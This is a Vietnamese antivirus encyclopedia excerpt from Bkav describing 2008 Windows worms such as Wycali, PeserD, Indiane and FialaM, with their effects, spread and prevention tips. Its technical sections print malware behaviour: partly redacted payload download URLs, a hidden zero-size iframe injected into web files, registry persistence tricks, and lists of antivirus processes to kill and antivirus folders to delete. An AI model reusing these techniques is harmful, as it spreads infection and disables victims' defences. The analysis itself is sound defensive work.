Bách Khoa Antivirus-Đặc Điểm Các Virus part 36 docx

Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.. Đổi tên session

Trang 1

127.0.0.1 liveupdatesnet.com

%SysDir%\%random_name%.exe được phát hiện là AgentProx, ghi key run: [HKLM\ \Windows\CurrentVersion\Run] với giá trị "Advanced DHTML Enable" = %SysDir%\%random_name%.exe

Chuyên viên phân tích : Tô Đình Hiệp

Bkav1672 (23/05/2008) cập nhật lần thứ 1: VetorDH, WycaliB

Malware cập nhật mới nhất:

Tên malware: W32.Wycali.Worm

Thuộc họ: W32.Wycali.Worm

Loại: Worm

Xuất xứ: Trung Quốc

Ngày phát hiện mẫu: 22/05/2008

Kích thước: 9Kb

Mức độ phá hoại: Cao

Nguy cơ:

Làm giảm mức độ an ninh của hệ thống

Mất các file GHO

Làm hỏng một số file chương trình

Hiện tượng:

Sửa registry

Không sử dụng được một vài chương trình antivirus

Trang 2

Cách thức lây nhiễm:

Phát tán qua trang web

Tự động lây nhiễm vào USB

Lây qua các file thực thi

Cách phòng tránh:

Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại

Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa

Mô tả kỹ thuật:

Tắt các process : avp.exe, kvsrvxp.exe, kissvc.exe

Kiểm tra nếu có process : avp.exe thì đặt lại năm hệ thống thành 2004

Xóa tất cả các file GHO

Tìm và lây nhiễm tất cả các file exe ngoại trừ : qq.exe, QQDoctor.exe,

QQDoctorMain.exe Đổi tên session cuối thành ".WYCao" nên một số chương trình ứng dụng sẽ không chạy được

Download file config từ link : http://x.u[removed]-01.net/x.txt

Đọc file config, nếu sau từ khóa InfeWeb: có đường link thì ghi link đó vào cuối tất cả các file có đuôi : do, htm, html, shtm, shtml, asp, aspx, php, jsp, cgi, xml

Download trojan OnlineGames từ các link :

http://1.fo[removed]00.net/a1.exe

http://1.fo[removed]d00.net/a36.exe

Chuyên viên phân tích : Nguyễn Công Cường

Một số malware đáng chú ý cập nhật cùng ngày: W32.AmvoDH.Worm,

W32.Bilano.Trojan, W32.CyberAle.Adware, W32.DownloadAB.Trojan,

W32.KavoXLF.Worm, W32.OnGamesXAA.Trojan, W32.Piery.Trojan,

W32.FloodBlack.Trojan, W32.RejoicerC.Worm, W32.SpybotV.Trojan,

Trang 3

W32.FakeAlertXA.Trojan, W32.CeekatK.Rootkit, W32.ProxyA.Trojan, W32.VetorDH.PE

Bkav1680 - Phát hành lần thứ 2 ngày 28/05/2008, cập nhật QuikMsg, AvpB, CinmusXF, KavoADS, NTRootB, PeserD, PeserE

Tên malware: W32.PeserD.Worm

Thuộc họ: W32.Peser.Worm

Loại: Worm

Xuất xứ: Nước ngoài

Nguy cơ:

Làm hỏng các file thực thi đã được pack

Sửa registry

Không chạy được một vài chương trình thực thi

Trang 4

Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động

Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy

Copy bản thân thành file có tên "mscrss.exe" vào thư mục %SysDir%

Copy bản thân kèm theo file Autorun.inf vào các ổ USB để lây nhiễm

Download file từ link :

http://ieopen.yhg[removed]es.com/iedown/down/upbho.exe

Chèn thêm vào các file : cgi, php, jsp, asp, html, htm dòng sau :

<iframe src="http://pk.yhg[removed]es.com/index.htm" width="0"

height="0"></iframe>

Tìm và lây nhiễm code độc vào các file *.exe (ngoại trừ thư mục Windows và ProgramFiles), đồng thời ghi bản thân worm vào Resource của file tìm được, làm các file thực thi đã pack đều không chạy được

Phát hành lần thứ 2 ngày 31/05/2008, cập nhật Indiane, MsiupA, KavoADX, CinmusEA, CPushD, FarfliBB, GamesOnDllA

Tên malware: W32.Indiane.Worm

Thuộc họ: W32.Indiane.Worm

Loại: Worm

Xuất xứ: Nước ngoài

Trang 5

Nguy cơ:

Sửa registry

Hiển thị 1 bức ảnh bông hồng khi vào ie

Hiện 1 hộp thông báo chứa nội dung bài hát ấn độ khi đăng nhập vào

windows

Không sử dụng được một vài chương trình và tiện ích của windows : notepad, regedit, msconfig, taskmgr,

Mất các menu : Run, Search,

Không hiện được các file ẩn, file hệ thống

Ghi giá trị

“WinUp”, "RsWin"

Vào key HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Trang 6

Sửa các key : "Shell", "Userinit" để virus được kích hoạt mỗi khi Windows khởi động

Xóa key không cho người dùng hiện các file ẩn và file hệ thống

Ghi key debugger để chạy file virus thay vì chạy các file : Regedit.exe,

Msconfig.exe, taskmgr.exe, ntvdm.exe, rstrui.exe

Ghi key hiện hộp thoại chứa bài hát "Kata Mutiara" mỗi khi đăng nhập vào windows

Copy bản thân thành các file vào thư mục hệ thống, ghi đè lên file Winrar.exe Copy bản thân kèm theo file Autorun.inf vào tất cả các ổ đĩa

Tìm các thư mục ở ổ đĩa gốc, tạo file exe trùng tên thư mục rồi ẩn chính thư mục đó

Tắt các process : cmd.exe, command.com, command.exe, ntvdm.exe,

msconfig.exe, procexp.exe, HijackThis.exe

rstrui.exe, notepad.exe, regedit.exe, taskmgr.exe, killbox.exe, SysMech6.exe, IoloSGCtrl.exe, SystemGuardAlerter.exe

Xóa tất cả các file trong thư mục :

progra~1\antivi~1\*.*

progra~1\ESET\*.*

pccill~1\*.*

iolo\*.*

norton~1\*.*

norton~2\*.*

msav\*.*

norman\*.*

pav\*.*

mcafee.com\VSO\*.*

mcafee~1\*.*

mcafee.com\agent\*.*

mcafee.com\*.*

kasper~2\*.*

mcafee\*.*

antivi~1\*.*

antivi~2\*.*

antiviru\*.*

Trang 7

avg\*.*

kasper~1\*.*

progra~1\antivi~2\*.*

progra~1\avg\*.*

progra~1\kasper~1\*.*

progra~1\kasper~2\*.*

progra~1\mcafee\*.*

progra~1\McAfee.com\agent\*.*

progra~1\McAfee.com\\*.*

progra~1\McAfee.com\VSO\*.*

progra~1\mcafee~1\*.*

progra~1\mindso~1\*.*

progra~1\norman\*.*

progra~1\norton~1\*.*

progra~1\norton~2\*.*

progra~1\pandas~1\*.*

Progra~1\Alwils~1\*.*

progra~1\iolo\*.*

pc-cil~1\*.*

progra~1\mcafee.com\agent\*.*

progra~1\mcafee.com\*.*

progra~1\mcafee.com\VSO\*.*

Bkav 1705 - Phát hành lần thứ 1 ngày 11/06/2008, cập nhật XorerR, Brute, AmvoYE, MmvoXA, DashfarC, DashferAE, FialaM, HacktoolO

Tên malware: W32.FialaM.Worm

Thuộc họ: W32.Fiala.Worm

Loại: Worm

Xuất xứ: Trung Quốc

Trang 8

Nguy cơ:

Bị ăn cắp mật khẩu tài khoản Game Online

Bị Hacker chiếm quyền điều khiển từ xa

Sửa registry

Không sử dụng được một số chương trình Antivirus, một vài tiện ích của Windows và một vài chương trình khác

Định dạng
Số trang	8
Dung lượng	81,53 KB